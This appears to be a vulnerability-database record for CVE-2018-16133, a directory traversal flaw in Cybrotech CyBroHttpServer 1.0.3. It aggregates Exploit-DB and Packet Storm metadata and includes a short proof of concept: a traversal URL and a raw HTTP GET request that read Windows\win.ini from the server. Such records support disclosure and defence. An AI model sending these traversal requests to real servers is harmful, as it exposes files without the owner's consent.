Sign-up

ID

VAR-E-201808-0259


CVE

cve_id:CVE-2018-16133

Trust: 2.1

sources: PACKETSTORM: 149177 // EXPLOIT-DB: 45303 // EDBNET: 99131

EDB ID

45303


TITLE

Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal - Windows_x86-64 webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 45303

DESCRIPTION

Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal. CVE-2018-16133 . webapps exploit for Windows_x86-64 platform

Trust: 0.6

sources: EXPLOIT-DB: 45303

AFFECTED PRODUCTS

vendor:cybrotechmodel:cybrohttpserverscope:eqversion:1.0.3

Trust: 2.1

sources: PACKETSTORM: 149177 // EXPLOIT-DB: 45303 // EDBNET: 99131

EXPLOIT

# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal
# Date: 2018-08-29
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: http://www.cybrotech.com/
# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
# Version: v1.0.3
# Tested on: Windows
# CVE: CVE-2018-16133

# PoC
https://<host>\..\..\..\..\Windows\win.ini

# CVE-2018-16133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16133
https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
https://emreovunc.com/blog/en/CyBroHttpServer-v.1.0.3-Directory-Traversal-3.png

GET \..\..\..\..\Windows\win.ini HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101
Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Trust: 1.0

sources: EXPLOIT-DB: 45303

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 45303

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 45303

TYPE

Directory Traversal

Trust: 1.6

sources: EXPLOIT-DB: 45303 // EDBNET: 99131

TAGS

tag:Traversal

Trust: 1.0

tag:exploit

Trust: 0.5

tag:file inclusion

Trust: 0.5

sources: PACKETSTORM: 149177 // EXPLOIT-DB: 45303

CREDITS

Emre ÖVÜNÇ

Trust: 0.6

sources: EXPLOIT-DB: 45303

EXTERNAL IDS

db:NVDid:CVE-2018-16133

Trust: 2.1

db:EXPLOIT-DBid:45303

Trust: 1.6

db:EDBNETid:99131

Trust: 0.6

db:PACKETSTORMid:149177

Trust: 0.5

sources: PACKETSTORM: 149177 // EXPLOIT-DB: 45303 // EDBNET: 99131

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2018-16133

Trust: 2.1

url:https://www.exploit-db.com/exploits/45303/

Trust: 0.6

sources: PACKETSTORM: 149177 // EXPLOIT-DB: 45303 // EDBNET: 99131

SOURCES

db:PACKETSTORMid:149177
db:EXPLOIT-DBid:45303
db:EDBNETid:99131

LAST UPDATE DATE

2022-07-27T09:21:19.536000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:149177date:2018-08-31T00:44:59
db:EXPLOIT-DBid:45303date:2018-08-30T00:00:00
db:EDBNETid:99131date:2018-08-30T00:00:00